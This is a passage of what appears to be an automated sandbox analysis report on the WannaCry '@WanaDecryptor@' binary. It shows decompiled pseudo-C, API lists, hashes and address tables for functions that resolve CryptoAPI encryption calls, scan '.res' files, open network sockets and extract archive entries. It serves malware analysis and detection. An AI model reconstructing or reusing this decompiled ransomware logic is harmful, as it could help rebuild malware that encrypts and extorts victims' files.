						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
							goto L10;
						} else {
							return 1;
						}
					}
				} else {
					return 1;
				}
			}





                                  0x00404b78
                                  0x00404b8c
                                  0x00404b90
                                  0x00404c29
                                  0x00404c2c
                                  0x00404b96
                                  0x00404bab
                                  0x00404bb8
                                  0x00404bc5
                                  0x00404bd2
                                  0x00404bdf
                                  0x00404be4
                                  0x00404bec
                                  0x00404bf4
                                  0x00000000
                                  0x00404c22
                                  0x00404c28
                                  0x00404c28
                                  0x00404bf4
                                  0x00404b7a
                                  0x00404b80
                                  0x00404b80

                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                  • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                  • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                  • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                  • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                  • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                  • API String ID: 2238633743-2459060434
                                  • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                  • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004080C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E004080C0(intOrPtr __ecx) {
				void _v999;
				char _v1000;
				void* _v1012;
				char _v1100;
				char _v1200;
				char _v1476;
				signed char _v1520;
				intOrPtr _v1648;
				void _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1696;
				void _v1788;
				void _v1792;
				void* _v1796;
				char _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				void* _v1820;
				char _t44;
				void* _t47;
				void* _t50;
				void* _t54;
				int _t57;
				int _t60;
				int _t62;
				struct _WIN32_FIND_DATAA* _t74;
				intOrPtr _t103;
				void* _t104;
				struct _IO_FILE* _t105;
				void* _t110;
				intOrPtr _t113;
				void* _t114;
				void* _t126;

				_t103 = __ecx;
				memset( &_v1788, 0, 0x21 << 2);
				_t44 =  *0x421798; // 0x0
				_v1000 = _t44;
				_v1808 = _t103;
				memset( &_v999, 0, 0xf9 << 2);
				_t110 =  &_v1808 + 0x18;
				asm("stosw");
				_t74 =  &_v1520;
				_v1804 = 0;
				asm("stosb");
				_t47 = FindFirstFileA("*.res", _t74);
				_v1796 = _t47;
				if(_t47 == 0xffffffff) {
					L13:
					_push(_v1804);
					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
					_t113 = _t110 + 0x30;
					_push(0);
					_v1808 = _t113;
					L00412CAA();
					_t79 = _t103;
					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
					if(_t54 != 0xffffffff) {
						return _t54;
					}
					_push(0);
					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
					L00412CAA();
					return E004082C0(_t103, _t113 + 0x340, _t79);
				} else {
					goto L2;
					L11:
					_t104 = _v1796;
					_t74 =  &_v1520;
					_t57 = FindNextFileA(_t104, _t74);
					_t124 = _t57;
					if(_t57 != 0) {
						L2:
						if((_v1520 & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
								_t110 = _t110 + 0xc;
								if(_t60 >= 1) {
									_t105 = fopen( &_v1476, "rb");
									_t110 = _t110 + 8;
									if(_t105 != 0) {
										_t62 = fread( &_v1656, 0x88, 1, _t105);
										_t114 = _t110 + 0x10;
										if(_t62 == 1 && _v1648 == _v1800) {
											_v1804 = _v1804 + 1;
										}
										fclose(_t105);
										_t110 = _t114 + 4;
										if(_v1648 == 0) {
											memcpy( &_v1792,  &_v1656, 0x22 << 2);
											_t110 = _t110 + 0xc;
										}
									}
								}
							}
						}
						goto L11;
					} else {
						FindClose(_t104);
						_t103 = _v1808;
						goto L13;
					}
				}
			}







































                                  0x004080c9
                                  0x004080d7
                                  0x004080d9
                                  0x004080e3
                                  0x004080f3
                                  0x004080f7
                                  0x004080f7
                                  0x004080f9
                                  0x004080fb
                                  0x00408102
                                  0x00408110
                                  0x00408111
                                  0x0040811a
                                  0x0040811e
                                  0x0040820a
                                  0x0040821c
                                  0x00408237
                                  0x00408266
                                  0x0040826c
                                  0x00408276
                                  0x0040827b
                                  0x00408280
                                  0x00408285
                                  0x00408287
                                  0x0040828f
                                  0x004082b8
                                  0x004082b8
                                  0x00408291
                                  0x0040829d
                                  0x004082a2
                                  0x00000000
                                  0x00408124
                                  0x0040812a
                                  0x004081e4
                                  0x004081e4
                                  0x004081e8
                                  0x004081f1
                                  0x004081f7
                                  0x004081f9
                                  0x00408130
                                  0x00408138
                                  0x0040814a
                                  0x00408152
                                  0x0040816a
                                  0x00408170
                                  0x00408176
                                  0x00408187
                                  0x00408189
                                  0x0040818e
                                  0x004081a0
                                  0x004081a2
                                  0x004081a8
                                  0x004081b9
                                  0x004081b9
                                  0x004081be
                                  0x004081cb
                                  0x004081d0
                                  0x004081e2
                                  0x004081e2
                                  0x004081e2
                                  0x004081d0
                                  0x0040818e
                                  0x00408176
                                  0x00408152
                                  0x00000000
                                  0x004081ff
                                  0x00408200
                                  0x00408206
                                  0x00000000
                                  0x00408206
                                  0x004081f9

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                  • API String ID: 1530363904-2310201135
                                  • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                  • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D6A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • htons.WS2_32 ref: 0040D6C7
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                  • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                  • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                  • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                  • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                  • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                  • closesocket.WS2_32(00000000), ref: 0040D80E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                  • String ID: `
                                  • API String ID: 478405425-1850852036
                                  • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                  • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411CF0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00411CF0(intOrPtr* __ecx) {
				intOrPtr _t142;
				signed int _t147;
				signed int _t149;
				intOrPtr _t150;
				void* _t152;
				signed int _t157;
				signed int _t160;
				unsigned int _t162;
				signed char _t164;
				struct _FILETIME _t177;
				struct _FILETIME _t180;
				intOrPtr _t182;
				signed int _t186;
				signed char _t188;
				struct _FILETIME _t204;
				struct _FILETIME _t212;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				intOrPtr* _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				signed int _t235;
				signed int _t239;
				unsigned int _t248;
				signed int _t249;
				int _t252;
				signed char _t264;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed int _t276;
				unsigned int _t297;
				signed int _t299;
				intOrPtr _t300;
				signed int _t303;
				intOrPtr _t307;
				intOrPtr _t309;
				signed int _t311;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr* _t336;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				void* _t343;
				void* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t312 =  *((intOrPtr*)(_t348 + 0x294));
				_t232 = _t231 | 0xffffffff;
				_t336 = __ecx;
				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
				if(_t312 < _t232) {
					L72:
					return 0x10000;
				} else {
					_t140 =  *__ecx;
					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
							E00411AC0(_t140);
							_t348 = _t348 + 4;
						}
						 *(_t336 + 4) = _t232;
						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
							__eflags = _t312 - _t232;
							if(_t312 != _t232) {
								_t142 =  *_t336;
								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
									E00411390(_t142);
									_t348 = _t348 + 4;
								}
								_t143 =  *_t336;
								__eflags =  *( *_t336 + 0x10) - _t312;
								while(__eflags < 0) {
									E004113E0(_t143);
									_t143 =  *_t336;
									_t348 = _t348 + 4;
									__eflags =  *( *_t336 + 0x10) - _t312;
								}
								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
								_t349 = _t348 + 0x30;
								__eflags = _t147;
								if(_t147 == 0) {
									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
									_t350 = _t349 + 0xc;
									__eflags = _t149;
									if(_t149 == 0) {
										_t150 =  *((intOrPtr*)(_t350 + 0x10));
										_push(_t150);
										L00412CEC();
										_t313 = _t150;
										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
										_t351 = _t350 + 0x14;
										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
											_t346 =  *(_t351 + 0x29c);
											asm("repne scasb");
											_t248 =  !_t232;
											 *_t346 =  *( *_t336 + 0x10);
											_t337 = _t351 + 0x88 - _t248;
											_t249 = _t248 >> 2;
											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
											__eflags = _t252;
											memcpy(_t337 + _t249 + _t249, _t337, _t252);
											_t353 = _t351 + 0x18;
											_t321 = _t353 + 0x190;
											while(1) {
												_t157 =  *_t321;
												__eflags = _t157;
												if(_t157 == 0) {
													goto L23;
												}
												L21:
												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
													_t321 = _t321 + 2;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												L23:
												__eflags = _t157 - 0x5c;
												if(_t157 == 0x5c) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												__eflags = _t157 - 0x2f;
												if(_t157 == 0x2f) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t41 = _t157 + 4; // 0x4
													_t321 = _t41;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t42 = _t157 + 4; // 0x4
													_t321 = _t42;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("/../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t43 = _t157 + 4; // 0x4
													_t321 = _t43;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
													goto L23;
												}
												_push("/..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t44 = _t157 + 4; // 0x4
													_t321 = _t44;
													continue;
												}
												asm("repne scasb");
												_t338 = _t321 -  !0xffffffff;
												_t297 =  *(_t353 + 0x70);
												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
												_t354 = _t353 + 0xc;
												 *((char*)(_t354 + 0x13)) = 0;
												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
												_t355 = _t354 + 0xc;
												_t164 = _t162 >> 0x0000001e & 0x00000001;
												_t264 =  !(_t297 >> 0x17) & 0x00000001;
												_t340 =  *(_t355 + 0x3c) >> 8;
												__eflags = _t340;
												 *(_t355 + 0x12) = 0;
												_t234 = 1;
												if(_t340 == 0) {
													L39:
													_t264 = _t297 & 0x00000001;
													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
													_t164 = _t297 >> 0x00000004 & 0x00000001;
													_t299 = _t297 >> 0x00000005 & 0x00000001;
													__eflags = _t299;
													_t234 = _t299;
												} else {
													__eflags = _t340 - 7;
													if(_t340 == 7) {
														goto L39;
													} else {
														__eflags = _t340 - 0xb;
														if(_t340 == 0xb) {
															goto L39;
														} else {
															__eflags = _t340 - 0xe;
															if(_t340 == 0xe) {
																goto L39;
															}
														}
													}
												}
												_t341 = 0;
												__eflags = _t164;
												 *(_t346 + 0x108) = 0;
												if(_t164 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t234;
												if(_t234 != 0) {
													_t219 =  *(_t346 + 0x108) | 0x00000020;
													__eflags = _t219;
													 *(_t346 + 0x108) = _t219;
												}
												__eflags =  *(_t355 + 0x13);
												if( *(_t355 + 0x13) != 0) {
													_t217 =  *(_t346 + 0x108) | 0x00000002;
													__eflags = _t217;
													 *(_t346 + 0x108) = _t217;
												}
												__eflags = _t264;
												if(_t264 != 0) {
													_t215 =  *(_t346 + 0x108) | 0x00000001;
													__eflags = _t215;
													 *(_t346 + 0x108) = _t215;
												}
												__eflags =  *(_t355 + 0x12);
												if( *(_t355 + 0x12) != 0) {
													_t63 = _t346 + 0x108;
													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t63;
												}
												_t300 =  *((intOrPtr*)(_t355 + 0x58));
												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
												_t356 = _t355 + 8;
												 *(_t356 + 0x30) = _t177;
												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
												_t180 =  *(_t356 + 0x28);
												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
												 *(_t346 + 0x10c) = _t180;
												 *(_t346 + 0x114) = _t180;
												 *(_t346 + 0x11c) = _t180;
												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
													_t329 =  *(_t356 + 0x1c);
												} else {
													_t329 =  *(_t356 + 0x1c);
													 *((char*)(_t356 + 0x1a)) = 0;
													do {
														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
														_t273 = "UT";
														_t186 = _t356 + 0x18;
														while(1) {
															_t235 =  *_t186;
															_t303 = _t235;
															__eflags = _t235 -  *_t273;
															if(_t235 !=  *_t273) {
																break;
															}
															__eflags = _t303;
															if(_t303 == 0) {
																L57:
																_t186 = 0;
															} else {
																_t239 =  *((intOrPtr*)(_t186 + 1));
																_t311 = _t239;
																_t92 = _t273 + 1; // 0x2f000054
																__eflags = _t239 -  *_t92;
																if(_t239 !=  *_t92) {
																	break;
																} else {
																	_t186 = _t186 + 2;
																	_t273 = _t273 + 2;
																	__eflags = _t311;
																	if(_t311 != 0) {
																		continue;
																	} else {
																		goto L57;
																	}
																}
															}
															L59:
															__eflags = _t186;
															if(_t186 == 0) {
																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
																_t343 = _t341 + 5;
																_t276 = 1;
																__eflags = _t188 & 0x00000001;
																 *((char*)(_t356 + 0x12)) = 1;
																if((_t188 & 0x00000001) != 0) {
																	_t309 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t212 = E00411B50(_t309, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x11c) = _t212;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
																}
																__eflags = 1;
																if(1 != 0) {
																	_t307 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t204 = E00411B50(_t307, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x10c) = _t204;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
																}
																__eflags = _t276;
																if(_t276 != 0) {
																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
																}
															} else {
																goto L60;
															}
															goto L69;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L59;
														L60:
														_t341 = _t341 + 4;
														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
												}
												L69:
												__eflags = _t329;
												if(_t329 != 0) {
													_push(_t329);
													L00412C98();
													_t356 = _t356 + 4;
												}
												_t182 =  *((intOrPtr*)(_t356 + 0x20));
												memcpy(_t182 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
												__eflags = 0;
												return 0;
												goto L73;
											}
										} else {
											_push(_t313);
											L00412C98();
											return 0x800;
										}
									} else {
										return 0x800;
									}
								} else {
									return 0x700;
								}
							} else {
								goto L8;
							}
						} else {
							if(_t312 == _t232) {
								L8:
								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
								 *((char*)(_t226 + 4)) = 0;
								 *((intOrPtr*)(_t226 + 0x108)) = 0;
								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
								 *((intOrPtr*)(_t226 + 0x110)) = 0;
								 *((intOrPtr*)(_t226 + 0x114)) = 0;
								 *((intOrPtr*)(_t226 + 0x118)) = 0;
								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
								 *((intOrPtr*)(_t226 + 0x120)) = 0;
								 *((intOrPtr*)(_t226 + 0x124)) = 0;
								 *((intOrPtr*)(_t226 + 0x128)) = 0;
								__eflags = 0;
								return 0;
							} else {
								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
							}
						}
					}
				}
				L73:
			}





























































                                  0x00411cf9
                                  0x00411d00
                                  0x00411d03
                                  0x00411d07
                                  0x00411d0b
                                  0x00412233
                                  0x0041223f
                                  0x00411d11
                                  0x00411d11
                                  0x00411d16
                                  0x00000000
                                  0x00411d1c
                                  0x00411d1f
                                  0x00411d22
                                  0x00411d27
                                  0x00411d27
                                  0x00411d30
                                  0x00411d35
                                  0x00411d5a
                                  0x00411d5c
                                  0x00411db5
                                  0x00411db7
                                  0x00411dba
                                  0x00411dbd
                                  0x00411dc2
                                  0x00411dc2
                                  0x00411dc5
                                  0x00411dc7
                                  0x00411dca
                                  0x00411dcd
                                  0x00411dd2
                                  0x00411dd4
                                  0x00411dd7
                                  0x00411dd7
                                  0x00411df9
                                  0x00411e10
                                  0x00411e15
                                  0x00411e18
                                  0x00411e1a
                                  0x00411e39
                                  0x00411e3e
                                  0x00411e41
                                  0x00411e43
                                  0x00411e56
                                  0x00411e5a
                                  0x00411e5b
                                  0x00411e62
                                  0x00411e68
                                  0x00411e73
                                  0x00411e7c
                                  0x00411e7f
                                  0x00411e81
                                  0x00411eae
                                  0x00411eb7
                                  0x00411eb9
                                  0x00411ebd
                                  0x00411ec9
                                  0x00411ecd
                                  0x00411ed4
                                  0x00411ed4
                                  0x00411ed7
                                  0x00411ed7
                                  0x00411ed9
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00411ee6
                                  0x00411ee6
                                  0x00411ee9
                                  0x00411eeb
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411ef0
                                  0x00411ef0
                                  0x00411ef2
                                  0x00411ef4
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411ef7
                                  0x00411ef9
                                  0x00411efb
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411efe
                                  0x00411f03
                                  0x00411f04
                                  0x00411f09
                                  0x00411f0c
                                  0x00411f0e
                                  0x00411f10
                                  0x00411f10
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411f15
                                  0x00411f1a
                                  0x00411f1b
                                  0x00411f20
                                  0x00411f23
                                  0x00411f25
                                  0x00411f27
                                  0x00411f27
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411f2c
                                  0x00411f31
                                  0x00411f32
                                  0x00411f37
                                  0x00411f3a
                                  0x00411f3c
                                  0x00411f3e
                                  0x00411f3e
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00000000
                                  0x00411ee0
                                  0x00411f43
                                  0x00411f48
                                  0x00411f49
                                  0x00411f4e
                                  0x00411f51
                                  0x00411f53
                                  0x00411f55
                                  0x00411f55
                                  0x00000000
                                  0x00411f55
                                  0x00411f5f
                                  0x00411f6a
                                  0x00411f6e
                                  0x00411f75
                                  0x00411f75
                                  0x00411f7e
                                  0x00411f83
                                  0x00411f83
                                  0x00411f93
                                  0x00411f95
                                  0x00411f98
                                  0x00411f98
                                  0x00411f9b
                                  0x00411fa0
                                  0x00411fa2
                                  0x00411fb3
                                  0x00411fbb
                                  0x00411fbe
                                  0x00411fc9
                                  0x00411fd5
                                  0x00411fd7
                                  0x00411fd7
                                  0x00411fda
                                  0x00411fa4
                                  0x00411fa4
                                  0x00411fa7
                                  0x00000000
                                  0x00411fa9
                                  0x00411fa9
                                  0x00411fac
                                  0x00000000
                                  0x00411fae
                                  0x00411fae
                                  0x00411fb1
                                  0x00000000
                                  0x00000000
                                  0x00411fb1
                                  0x00411fac
                                  0x00411fa7
                                  0x00411fdc
                                  0x00411fde
                                  0x00411fe0
                                  0x00411fe6
                                  0x00411fe8
                                  0x00411fe8
                                  0x00411ff2
                                  0x00411ff4
                                  0x00411ffc
                                  0x00411ffc
                                  0x00411ffe
                                  0x00411ffe
                                  0x00412008
                                  0x0041200a
                                  0x00412012
                                  0x00412012
                                  0x00412014
                                  0x00412014
                                  0x0041201a
                                  0x0041201c
                                  0x00412024
                                  0x00412024
                                  0x00412026
                                  0x00412026
                                  0x00412035
                                  0x00412037
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412043
                                  0x00412047
                                  0x00412058
                                  0x0041205e
                                  0x00412063
                                  0x00412066
                                  0x00412074
                                  0x00412078
                                  0x0041207e
                                  0x00412082
                                  0x00412086
                                  0x0041208c
                                  0x00412092
                                  0x0041209c
